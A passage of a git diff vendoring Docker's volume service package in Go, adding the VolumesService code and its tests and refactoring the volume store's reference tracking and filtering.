+	"context"
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/volume"
+	volumedrivers "github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/service/opts"
+	volumetestutils "github.com/docker/docker/volume/testutils"
+	"gotest.tools/assert"
+)
+
+func TestRestore(t *testing.T) {
+	t.Parallel()
+
+	dir, err := ioutil.TempDir("", "test-restore")
+	assert.NilError(t, err)
+	defer os.RemoveAll(dir)
+
+	drivers := volumedrivers.NewStore(nil)
+	driverName := "test-restore"
+	drivers.Register(volumetestutils.NewFakeDriver(driverName), driverName)
+
+	s, err := NewStore(dir, drivers)
+	assert.NilError(t, err)
+	defer s.Shutdown()
+
+	ctx := context.Background()
+	_, err = s.Create(ctx, "test1", driverName)
+	assert.NilError(t, err)
+
+	testLabels := map[string]string{"a": "1"}
+	testOpts := map[string]string{"foo": "bar"}
+	_, err = s.Create(ctx, "test2", driverName, opts.WithCreateOptions(testOpts), opts.WithCreateLabels(testLabels))
+	assert.NilError(t, err)
+
+	s.Shutdown()
+
+	s, err = NewStore(dir, drivers)
+	assert.NilError(t, err)
+
+	v, err := s.Get(ctx, "test1")
+	assert.NilError(t, err)
+
+	dv := v.(volume.DetailedVolume)
+	var nilMap map[string]string
+	assert.DeepEqual(t, nilMap, dv.Options())
+	assert.DeepEqual(t, nilMap, dv.Labels())
+
+	v, err = s.Get(ctx, "test2")
+	assert.NilError(t, err)
+	dv = v.(volume.DetailedVolume)
+	assert.DeepEqual(t, testOpts, dv.Options())
+	assert.DeepEqual(t, testLabels, dv.Labels())
+}
diff --git a/vendor/github.com/docker/docker/volume/service/service.go b/vendor/github.com/docker/docker/volume/service/service.go
new file mode 100644
index 0000000000..a62a32de50
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/service.go
@@ -0,0 +1,243 @@
+package service // import "github.com/docker/docker/volume/service"
+
+import (
+	"context"
+	"sync/atomic"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/directory"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/volume"
+	"github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/service/opts"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+type ds interface {
+	GetDriverList() []string
+}
+
+type volumeEventLogger interface {
+	LogVolumeEvent(volumeID, action string, attributes map[string]string)
+}
+
+// VolumesService manages access to volumes
+type VolumesService struct {
+	vs           *VolumeStore
+	ds           ds
+	pruneRunning int32
+	eventLogger  volumeEventLogger
+}
+
+// NewVolumeService creates a new volume service
+func NewVolumeService(root string, pg plugingetter.PluginGetter, rootIDs idtools.IDPair, logger volumeEventLogger) (*VolumesService, error) {
+	ds := drivers.NewStore(pg)
+	if err := setupDefaultDriver(ds, root, rootIDs); err != nil {
+		return nil, err
+	}
+
+	vs, err := NewStore(root, ds)
+	if err != nil {
+		return nil, err
+	}
+	return &VolumesService{vs: vs, ds: ds, eventLogger: logger}, nil
+}
+
+// GetDriverList gets the list of registered volume drivers
+func (s *VolumesService) GetDriverList() []string {
+	return s.ds.GetDriverList()
+}
+
+// Create creates a volume
+func (s *VolumesService) Create(ctx context.Context, name, driverName string, opts ...opts.CreateOption) (*types.Volume, error) {
+	if name == "" {
+		name = stringid.GenerateNonCryptoID()
+	}
+	v, err := s.vs.Create(ctx, name, driverName, opts...)
+	if err != nil {
+		return nil, err
+	}
+
+	s.eventLogger.LogVolumeEvent(v.Name(), "create", map[string]string{"driver": v.DriverName()})
+	apiV := volumeToAPIType(v)
+	return &apiV, nil
+}
+
+// Get gets a volume
+func (s *VolumesService) Get(ctx context.Context, name string, getOpts ...opts.GetOption) (*types.Volume, error) {
+	v, err := s.vs.Get(ctx, name, getOpts...)
+	if err != nil {
+		return nil, err
+	}
+	vol := volumeToAPIType(v)
+
+	var cfg opts.GetConfig
+	for _, o := range getOpts {
+		o(&cfg)
+	}
+
+	if cfg.ResolveStatus {
+		vol.Status = v.Status()
+	}
+	return &vol, nil
+}
+
+// Mount mounts the volume
+func (s *VolumesService) Mount(ctx context.Context, vol *types.Volume, ref string) (string, error) {
+	v, err := s.vs.Get(ctx, vol.Name, opts.WithGetDriver(vol.Driver))
+	if err != nil {
+		if IsNotExist(err) {
+			err = errdefs.NotFound(err)
+		}
+		return "", err
+	}
+	return v.Mount(ref)
+}
+
+// Unmount unmounts the volume.
+// Note that depending on the implementation, the volume may still be mounted due to other resources using it.
+func (s *VolumesService) Unmount(ctx context.Context, vol *types.Volume, ref string) error {
+	v, err := s.vs.Get(ctx, vol.Name, opts.WithGetDriver(vol.Driver))
+	if err != nil {
+		if IsNotExist(err) {
+			err = errdefs.NotFound(err)
+		}
+		return err
+	}
+	return v.Unmount(ref)
+}
+
+// Release releases a volume reference
+func (s *VolumesService) Release(ctx context.Context, name string, ref string) error {
+	return s.vs.Release(ctx, name, ref)
+}
+
+// Remove removes a volume
+func (s *VolumesService) Remove(ctx context.Context, name string, rmOpts ...opts.RemoveOption) error {
+	var cfg opts.RemoveConfig
+	for _, o := range rmOpts {
+		o(&cfg)
+	}
+
+	v, err := s.vs.Get(ctx, name)
+	if err != nil {
+		if IsNotExist(err) && cfg.PurgeOnError {
+			return nil
+		}
+		return err
+	}
+
+	err = s.vs.Remove(ctx, v, rmOpts...)
+	if IsNotExist(err) {
+		err = nil
+	} else if IsInUse(err) {
+		err = errdefs.Conflict(err)
+	} else if IsNotExist(err) && cfg.PurgeOnError {
+		err = nil
+	}
+
+	if err == nil {
+		s.eventLogger.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()})
+	}
+	return err
+}
+
+var acceptedPruneFilters = map[string]bool{
+	"label":  true,
+	"label!": true,
+}
+
+var acceptedListFilters = map[string]bool{
+	"dangling": true,
+	"name":     true,
+	"driver":   true,
+	"label":    true,
+}
+
+// LocalVolumesSize gets all local volumes and fetches their size on disk
+// Note that this intentionally skips volumes which have mount options. Typically
+// volumes with mount options are not really local even if they are using the
+// local driver.
+func (s *VolumesService) LocalVolumesSize(ctx context.Context) ([]*types.Volume, error) {
+	ls, _, err := s.vs.Find(ctx, And(ByDriver(volume.DefaultDriverName), CustomFilter(func(v volume.Volume) bool {
+		dv, ok := v.(volume.DetailedVolume)
+		return ok && len(dv.Options()) == 0
+	})))
+	if err != nil {
+		return nil, err
+	}
+	return s.volumesToAPI(ctx, ls, calcSize(true)), nil
+}
+
+// Prune removes (local) volumes which match the past in filter arguments.
+// Note that this intentionally skips volumes with mount options as there would
+// be no space reclaimed in this case.
+func (s *VolumesService) Prune(ctx context.Context, filter filters.Args) (*types.VolumesPruneReport, error) {
+	if !atomic.CompareAndSwapInt32(&s.pruneRunning, 0, 1) {
+		return nil, errdefs.Conflict(errors.New("a prune operation is already running"))
+	}
+	defer atomic.StoreInt32(&s.pruneRunning, 0)
+
+	by, err := filtersToBy(filter, acceptedPruneFilters)
+	if err != nil {
+		return nil, err
+	}
+	ls, _, err := s.vs.Find(ctx, And(ByDriver(volume.DefaultDriverName), ByReferenced(false), by, CustomFilter(func(v volume.Volume) bool {
+		dv, ok := v.(volume.DetailedVolume)
+		return ok && len(dv.Options()) == 0
+	})))
+	if err != nil {
+		return nil, err
+	}
+
+	rep := &types.VolumesPruneReport{VolumesDeleted: make([]string, 0, len(ls))}
+	for _, v := range ls {
+		select {
+		case <-ctx.Done():
+			err := ctx.Err()
+			if err == context.Canceled {
+				err = nil
+			}
+			return rep, err
+		default:
+		}
+
+		vSize, err := directory.Size(ctx, v.Path())
+		if err != nil {
+			logrus.WithField("volume", v.Name()).WithError(err).Warn("could not determine size of volume")
+		}
+		if err := s.vs.Remove(ctx, v); err != nil {
+			logrus.WithError(err).WithField("volume", v.Name()).Warnf("Could not determine size of volume")
+			continue
+		}
+		rep.SpaceReclaimed += uint64(vSize)
+		rep.VolumesDeleted = append(rep.VolumesDeleted, v.Name())
+	}
+	return rep, nil
+}
+
+// List gets the list of volumes which match the past in filters
+// If filters is nil or empty all volumes are returned.
+func (s *VolumesService) List(ctx context.Context, filter filters.Args) (volumesOut []*types.Volume, warnings []string, err error) {
+	by, err := filtersToBy(filter, acceptedListFilters)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	volumes, warnings, err := s.vs.Find(ctx, by)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	return s.volumesToAPI(ctx, volumes, useCachedPath(true)), warnings, nil
+}
+
+// Shutdown shuts down the image service and dependencies
+func (s *VolumesService) Shutdown() error {
+	return s.vs.Shutdown()
+}
diff --git a/vendor/github.com/docker/docker/volume/service/service_linux_test.go b/vendor/github.com/docker/docker/volume/service/service_linux_test.go
new file mode 100644
index 0000000000..ae70d7e2c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/service_linux_test.go
@@ -0,0 +1,66 @@
+package service
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/volume"
+	volumedrivers "github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/local"
+	"github.com/docker/docker/volume/service/opts"
+	"github.com/docker/docker/volume/testutils"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestLocalVolumeSize(t *testing.T) {
+	t.Parallel()
+
+	ds := volumedrivers.NewStore(nil)
+	dir, err := ioutil.TempDir("", t.Name())
+	assert.Assert(t, err)
+	defer os.RemoveAll(dir)
+
+	l, err := local.New(dir, idtools.IDPair{UID: os.Getuid(), GID: os.Getegid()})
+	assert.Assert(t, err)
+	assert.Assert(t, ds.Register(l, volume.DefaultDriverName))
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("fake"), "fake"))
+
+	service, cleanup := newTestService(t, ds)
+	defer cleanup()
+
+	ctx := context.Background()
+	v1, err := service.Create(ctx, "test1", volume.DefaultDriverName, opts.WithCreateReference("foo"))
+	assert.Assert(t, err)
+	v2, err := service.Create(ctx, "test2", volume.DefaultDriverName)
+	assert.Assert(t, err)
+	_, err = service.Create(ctx, "test3", "fake")
+	assert.Assert(t, err)
+
+	data := make([]byte, 1024)
+	err = ioutil.WriteFile(filepath.Join(v1.Mountpoint, "data"), data, 0644)
+	assert.Assert(t, err)
+	err = ioutil.WriteFile(filepath.Join(v2.Mountpoint, "data"), data[:1], 0644)
+	assert.Assert(t, err)
+
+	ls, err := service.LocalVolumesSize(ctx)
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(ls, 2))
+
+	for _, v := range ls {
+		switch v.Name {
+		case "test1":
+			assert.Assert(t, is.Equal(v.UsageData.Size, int64(len(data))))
+			assert.Assert(t, is.Equal(v.UsageData.RefCount, int64(1)))
+		case "test2":
+			assert.Assert(t, is.Equal(v.UsageData.Size, int64(len(data[:1]))))
+			assert.Assert(t, is.Equal(v.UsageData.RefCount, int64(0)))
+		default:
+			t.Fatalf("got unexpected volume: %+v", v)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/service/service_test.go b/vendor/github.com/docker/docker/volume/service/service_test.go
new file mode 100644
index 0000000000..870d19f8a0
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/service/service_test.go
@@ -0,0 +1,253 @@
+package service
+
+import (
+	"context"
+	"io/ioutil"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/volume"
+	volumedrivers "github.com/docker/docker/volume/drivers"
+	"github.com/docker/docker/volume/service/opts"
+	"github.com/docker/docker/volume/testutils"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestServiceCreate(t *testing.T) {
+	t.Parallel()
+
+	ds := volumedrivers.NewStore(nil)
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1"))
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2"))
+
+	ctx := context.Background()
+	service, cleanup := newTestService(t, ds)
+	defer cleanup()
+
+	_, err := service.Create(ctx, "v1", "notexist")
+	assert.Assert(t, errdefs.IsNotFound(err), err)
+
+	v, err := service.Create(ctx, "v1", "d1")
+	assert.Assert(t, err)
+
+	vCopy, err := service.Create(ctx, "v1", "d1")
+	assert.Assert(t, err)
+	assert.Assert(t, is.DeepEqual(v, vCopy))
+
+	_, err = service.Create(ctx, "v1", "d2")
+	assert.Check(t, IsNameConflict(err), err)
+	assert.Check(t, errdefs.IsConflict(err), err)
+
+	assert.Assert(t, service.Remove(ctx, "v1"))
+	_, err = service.Create(ctx, "v1", "d2")
+	assert.Assert(t, err)
+	_, err = service.Create(ctx, "v1", "d2")
+	assert.Assert(t, err)
+
+}
+
+func TestServiceList(t *testing.T) {
+	t.Parallel()
+
+	ds := volumedrivers.NewStore(nil)
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1"))
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2"))
+
+	service, cleanup := newTestService(t, ds)
+	defer cleanup()
+
+	ctx := context.Background()
+
+	_, err := service.Create(ctx, "v1", "d1")
+	assert.Assert(t, err)
+	_, err = service.Create(ctx, "v2", "d1")
+	assert.Assert(t, err)
+	_, err = service.Create(ctx, "v3", "d2")
+	assert.Assert(t, err)
+
+	ls, _, err := service.List(ctx, filters.NewArgs(filters.Arg("driver", "d1")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 2))
+
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("driver", "d2")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 1))
+
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("driver", "notexist")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 0))
+
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 3))
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 0))
+
+	_, err = service.Get(ctx, "v1", opts.WithGetReference("foo"))
+	assert.Assert(t, err)
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 2))
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 1))
+
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "false"), filters.Arg("driver", "d2")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 0))
+	ls, _, err = service.List(ctx, filters.NewArgs(filters.Arg("dangling", "true"), filters.Arg("driver", "d2")))
+	assert.Assert(t, err)
+	assert.Check(t, is.Len(ls, 1))
+}
+
+func TestServiceRemove(t *testing.T) {
+	t.Parallel()
+
+	ds := volumedrivers.NewStore(nil)
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1"))
+
+	service, cleanup := newTestService(t, ds)
+	defer cleanup()
+	ctx := context.Background()
+
+	_, err := service.Create(ctx, "test", "d1")
+	assert.Assert(t, err)
+
+	assert.Assert(t, service.Remove(ctx, "test"))
+	assert.Assert(t, service.Remove(ctx, "test", opts.WithPurgeOnError(true)))
+}
+
+func TestServiceGet(t *testing.T) {
+	t.Parallel()
+
+	ds := volumedrivers.NewStore(nil)
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d1"), "d1"))
+
+	service, cleanup := newTestService(t, ds)
+	defer cleanup()
+	ctx := context.Background()
+
+	v, err := service.Get(ctx, "notexist")
+	assert.Assert(t, IsNotExist(err))
+	assert.Check(t, v == nil)
+
+	created, err := service.Create(ctx, "test", "d1")
+	assert.Assert(t, err)
+	assert.Assert(t, created != nil)
+
+	v, err = service.Get(ctx, "test")
+	assert.Assert(t, err)
+	assert.Assert(t, is.DeepEqual(created, v))
+
+	v, err = service.Get(ctx, "test", opts.WithGetResolveStatus)
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(v.Status, 1), v.Status)
+
+	v, err = service.Get(ctx, "test", opts.WithGetDriver("notarealdriver"))
+	assert.Assert(t, errdefs.IsConflict(err), err)
+	v, err = service.Get(ctx, "test", opts.WithGetDriver("d1"))
+	assert.Assert(t, err == nil)
+	assert.Assert(t, is.DeepEqual(created, v))
+
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("d2"), "d2"))
+	v, err = service.Get(ctx, "test", opts.WithGetDriver("d2"))
+	assert.Assert(t, errdefs.IsConflict(err), err)
+}
+
+func TestServicePrune(t *testing.T) {
+	t.Parallel()
+
+	ds := volumedrivers.NewStore(nil)
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver(volume.DefaultDriverName), volume.DefaultDriverName))
+	assert.Assert(t, ds.Register(testutils.NewFakeDriver("other"), "other"))
+
+	service, cleanup := newTestService(t, ds)
+	defer cleanup()
+	ctx := context.Background()
+
+	_, err := service.Create(ctx, "test", volume.DefaultDriverName)
+	assert.Assert(t, err)
+	_, err = service.Create(ctx, "test2", "other")
+	assert.Assert(t, err)
+
+	pr, err := service.Prune(ctx, filters.NewArgs(filters.Arg("label", "banana")))
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 0))
+
+	pr, err = service.Prune(ctx, filters.NewArgs())
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 1))
+	assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test"))
+
+	_, err = service.Get(ctx, "test")
+	assert.Assert(t, IsNotExist(err), err)
+
+	v, err := service.Get(ctx, "test2")
+	assert.Assert(t, err)
+	assert.Assert(t, is.Equal(v.Driver, "other"))
+
+	_, err = service.Create(ctx, "test", volume.DefaultDriverName)
+	assert.Assert(t, err)
+
+	pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana")))
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 1))
+	assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test"))
+	v, err = service.Get(ctx, "test2")
+	assert.Assert(t, err)
+	assert.Assert(t, is.Equal(v.Driver, "other"))
+
+	_, err = service.Create(ctx, "test", volume.DefaultDriverName, opts.WithCreateLabels(map[string]string{"banana": ""}))
+	assert.Assert(t, err)
+	pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana")))
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 0))
+
+	_, err = service.Create(ctx, "test3", volume.DefaultDriverName, opts.WithCreateLabels(map[string]string{"banana": "split"}))
+	assert.Assert(t, err)
+	pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label!", "banana=split")))
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 1))
+	assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test"))
+
+	pr, err = service.Prune(ctx, filters.NewArgs(filters.Arg("label", "banana=split")))
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 1))
+	assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test3"))
+
+	v, err = service.Create(ctx, "test", volume.DefaultDriverName, opts.WithCreateReference(t.Name()))
+	assert.Assert(t, err)
+
+	pr, err = service.Prune(ctx, filters.NewArgs())
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 0))
+	assert.Assert(t, service.Release(ctx, v.Name, t.Name()))
+
+	pr, err = service.Prune(ctx, filters.NewArgs())
+	assert.Assert(t, err)
+	assert.Assert(t, is.Len(pr.VolumesDeleted, 1))
+	assert.Assert(t, is.Equal(pr.VolumesDeleted[0], "test"))
+}
+
+func newTestService(t *testing.T, ds *volumedrivers.Store) (*VolumesService, func()) {
+	t.Helper()
+
+	dir, err := ioutil.TempDir("", t.Name())
+	assert.Assert(t, err)
+
+	store, err := NewStore(dir, ds)
+	assert.Assert(t, err)
+	s := &VolumesService{vs: store, eventLogger: dummyEventLogger{}}
+	return s, func() {
+		assert.Check(t, s.Shutdown())
+		assert.Check(t, os.RemoveAll(dir))
+	}
+}
+
+type dummyEventLogger struct{}
+
+func (dummyEventLogger) LogVolumeEvent(_, _ string, _ map[string]string) {}
diff --git a/vendor/github.com/docker/docker/volume/store/store.go b/vendor/github.com/docker/docker/volume/service/store.go
similarity index 51%
rename from vendor/github.com/docker/docker/volume/store/store.go
rename to vendor/github.com/docker/docker/volume/service/store.go
index 38afd86f45..e7e9d8a320 100644
--- a/vendor/github.com/docker/docker/volume/store/store.go
+++ b/vendor/github.com/docker/docker/volume/service/store.go
@@ -1,19 +1,25 @@
-package store
+package service // import "github.com/docker/docker/volume/service"
 
 import (
+	"context"
+	"fmt"
 	"net"
 	"os"
 	"path/filepath"
+	"runtime"
 	"sync"
 	"time"
 
 	"github.com/pkg/errors"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/boltdb/bolt"
+	"github.com/docker/docker/errdefs"
 	"github.com/docker/docker/pkg/locker"
 	"github.com/docker/docker/volume"
 	"github.com/docker/docker/volume/drivers"
+	volumemounts "github.com/docker/docker/volume/mounts"
+	"github.com/docker/docker/volume/service/opts"
+	"github.com/sirupsen/logrus"
 )
 
 const (
@@ -28,7 +34,10 @@ type volumeWrapper struct {
 }
 
 func (v volumeWrapper) Options() map[string]string {
-	options := map[string]string{}
+	if v.options == nil {
+		return nil
+	}
+	options := make(map[string]string, len(v.options))
 	for key, value := range v.options {
 		options[key] = value
 	}
@@ -36,7 +45,15 @@ func (v volumeWrapper) Options() map[string]string {
 }
 
 func (v volumeWrapper) Labels() map[string]string {
-	return v.labels
+	if v.labels == nil {
+		return nil
+	}
+
+	labels := make(map[string]string, len(v.labels))
+	for key, value := range v.labels {
+		labels[key] = value
+	}
+	return labels
 }
 
 func (v volumeWrapper) Scope() string {
@@ -52,28 +69,26 @@ func (v volumeWrapper) CachedPath() string {
 	return v.Volume.Path()
 }
 
-// New initializes a VolumeStore to keep
-// reference counting of volumes in the system.
-func New(rootPath string) (*VolumeStore, error) {
+// NewStore creates a new volume store at the given path
+func NewStore(rootPath string, drivers *drivers.Store) (*VolumeStore, error) {
 	vs := &VolumeStore{
 		locks:   &locker.Locker{},
 		names:   make(map[string]volume.Volume),
-		refs:    make(map[string][]string),
+		refs:    make(map[string]map[string]struct{}),
 		labels:  make(map[string]map[string]string),
 		options: make(map[string]map[string]string),
+		drivers: drivers,
 	}
 
 	if rootPath != "" {
 		// initialize metadata store
 		volPath := filepath.Join(rootPath, volumeDataDir)
-		if err := os.MkdirAll(volPath, 750); err != nil {
+		if err := os.MkdirAll(volPath, 0750); err != nil {
 			return nil, err
 		}
 
-		dbPath := filepath.Join(volPath, "metadata.db")
-
 		var err error
-		vs.db, err = bolt.Open(dbPath, 0600, &bolt.Options{Timeout: 1 * time.Second})
+		vs.db, err = bolt.Open(filepath.Join(volPath, "metadata.db"), 0600, &bolt.Options{Timeout: 1 * time.Second})
 		if err != nil {
 			return nil, errors.Wrap(err, "error while opening volume store metadata database")
 		}
@@ -102,31 +117,59 @@ func (s *VolumeStore) getNamed(name string) (volume.Volume, bool) {
 }
 
 func (s *VolumeStore) setNamed(v volume.Volume, ref string) {
+	name := v.Name()
+
 	s.globalLock.Lock()
-	s.names[v.Name()] = v
+	s.names[name] = v
 	if len(ref) > 0 {
-		s.refs[v.Name()] = append(s.refs[v.Name()], ref)
+		if s.refs[name] == nil {
+			s.refs[name] = make(map[string]struct{})
+		}
+		s.refs[name][ref] = struct{}{}
 	}
 	s.globalLock.Unlock()
 }
 
+// hasRef returns true if the given name has at least one ref.
+// Callers of this function are expected to hold the name lock.
+func (s *VolumeStore) hasRef(name string) bool {
+	s.globalLock.RLock()
+	l := len(s.refs[name])
+	s.globalLock.RUnlock()
+	return l > 0
+}
+
 // getRefs gets the list of refs for a given name
 // Callers of this function are expected to hold the name lock.
 func (s *VolumeStore) getRefs(name string) []string {
 	s.globalLock.RLock()
-	refs := s.refs[name]
-	s.globalLock.RUnlock()
+	defer s.globalLock.RUnlock()
+
+	refs := make([]string, 0, len(s.refs[name]))
+	for r := range s.refs[name] {
+		refs = append(refs, r)
+	}
+
 	return refs
 }
 
-// Purge allows the cleanup of internal data on docker in case
+// purge allows the cleanup of internal data on docker in case
 // the internal data is out of sync with volumes driver plugins.
-func (s *VolumeStore) Purge(name string) {
+func (s *VolumeStore) purge(ctx context.Context, name string) error {
 	s.globalLock.Lock()
+	defer s.globalLock.Unlock()
+
+	select {
+	case <-ctx.Done():
+		return ctx.Err()
+	default:
+	}
+
 	v, exists := s.names[name]
 	if exists {
-		if _, err := volumedrivers.RemoveDriver(v.DriverName()); err != nil {
-			logrus.Error("Error dereferencing volume driver: %v", err)
+		driverName := v.DriverName()
+		if _, err := s.drivers.ReleaseDriver(driverName); err != nil {
+			logrus.WithError(err).WithField("driver", driverName).Error("Error releasing reference to volume driver")
 		}
 	}
 	if err := s.removeMeta(name); err != nil {
@@ -136,21 +179,22 @@ func (s *VolumeStore) Purge(name string) {
 	delete(s.refs, name)
 	delete(s.labels, name)
 	delete(s.options, name)
-	s.globalLock.Unlock()
+	return nil
 }
 
 // VolumeStore is a struct that stores the list of volumes available and keeps track of their usage counts
 type VolumeStore struct {
 	// locks ensures that only one action is being performed on a particular volume at a time without locking the entire store
 	// since actions on volumes can be quite slow, this ensures the store is free to handle requests for other volumes.
-	locks *locker.Locker
+	locks   *locker.Locker
+	drivers *drivers.Store
 	// globalLock is used to protect access to mutable structures used by the store object
 	globalLock sync.RWMutex
 	// names stores the volume name -> volume relationship.
 	// This is used for making lookups faster so we don't have to probe all drivers
 	names map[string]volume.Volume
 	// refs stores the volume name and the list of things referencing it
-	refs map[string][]string
+	refs map[string]map[string]struct{}
 	// labels stores volume labels for each volume
 	labels map[string]map[string]string
 	// options stores volume options for each volume
@@ -158,18 +202,141 @@ type VolumeStore struct {
 	db      *bolt.DB
 }
 
-// List proxies to all registered volume drivers to get the full list of volumes
+func filterByDriver(names []string) filterFunc {
+	return func(v volume.Volume) bool {
+		for _, name := range names {
+			if name == v.DriverName() {
+				return true
+			}
+		}
+		return false
+	}
+}
+
+func (s *VolumeStore) byReferenced(referenced bool) filterFunc {
+	return func(v volume.Volume) bool {
+		return s.hasRef(v.Name()) == referenced
+	}
+}
+
+func (s *VolumeStore) filter(ctx context.Context, vols *[]volume.Volume, by By) (warnings []string, err error) {
+	// note that this specifically does not support the `FromList` By type.
+	switch f := by.(type) {
+	case nil:
+		if *vols == nil {
+			var ls []volume.Volume
+			ls, warnings, err = s.list(ctx)
+			if err != nil {
+				return warnings, err
+			}
+			*vols = ls
+		}
+	case byDriver:
+		if *vols != nil {
+			filter(vols, filterByDriver([]string(f)))
+			return nil, nil
+		}
+		var ls []volume.Volume
+		ls, warnings, err = s.list(ctx, []string(f)...)
+		if err != nil {
+			return nil, err
+		}
+		*vols = ls
+	case ByReferenced:
+		// TODO(@cpuguy83): It would be nice to optimize this by looking at the list
+		// of referenced volumes, however the locking strategy makes this difficult
+		// without either providing inconsistent data or deadlocks.
+		if *vols == nil {
+			var ls []volume.Volume
+			ls, warnings, err = s.list(ctx)
+			if err != nil {
+				return nil, err
+			}
+			*vols = ls
+		}
+		filter(vols, s.byReferenced(bool(f)))
+	case andCombinator:
+		for _, by := range f {
+			w, err := s.filter(ctx, vols, by)
+			if err != nil {
+				return warnings, err
+			}
+			warnings = append(warnings, w...)
+		}
+	case orCombinator:
+		for _, by := range f {
+			switch by.(type) {
+			case byDriver:
+				var ls []volume.Volume
+				w, err := s.filter(ctx, &ls, by)
+				if err != nil {
+					return warnings, err
+				}
+				warnings = append(warnings, w...)
+			default:
+				ls, w, err := s.list(ctx)
+				if err != nil {
+					return warnings, err
+				}
+				warnings = append(warnings, w...)
+				w, err = s.filter(ctx, &ls, by)
+				if err != nil {
+					return warnings, err
+				}
+				warnings = append(warnings, w...)
+				*vols = append(*vols, ls...)
+			}
+		}
+		unique(vols)
+	case CustomFilter:
+		if *vols == nil {
+			var ls []volume.Volume
+			ls, warnings, err = s.list(ctx)
+			if err != nil {
+				return nil, err
+			}
+			*vols = ls
+		}
+		filter(vols, filterFunc(f))
+	default:
+		return nil, errdefs.InvalidParameter(errors.Errorf("unsupported filter: %T", f))
+	}
+	return warnings, nil
+}
+
+func unique(ls *[]volume.Volume) {
+	names := make(map[string]bool, len(*ls))
+	filter(ls, func(v volume.Volume) bool {
+		if names[v.Name()] {
+			return false
+		}
+		names[v.Name()] = true
+		return true
+	})
+}
+
+// Find lists volumes filtered by the past in filter.
 // If a driver returns a volume that has name which conflicts with another volume from a different driver,
 // the first volume is chosen and the conflicting volume is dropped.
-func (s *VolumeStore) List() ([]volume.Volume, []string, error) {
-	vols, warnings, err := s.list()
+func (s *VolumeStore) Find(ctx context.Context, by By) (vols []volume.Volume, warnings []string, err error) {
+	logrus.WithField("ByType", fmt.Sprintf("%T", by)).WithField("ByValue", fmt.Sprintf("%+v", by)).Debug("VolumeStore.Find")
+	switch f := by.(type) {
+	case nil, orCombinator, andCombinator, byDriver, ByReferenced, CustomFilter:
+		warnings, err = s.filter(ctx, &vols, by)
+	case fromList:
+		warnings, err = s.filter(ctx, f.ls, f.by)
+	default:
+		// Really shouldn't be possible, but makes sure that any new By's are added to this check.
+		err = errdefs.InvalidParameter(errors.Errorf("unsupported filter type: %T", f))
+	}
 	if err != nil {
 		return nil, nil, &OpErr{Err: err, Op: "list"}
 	}
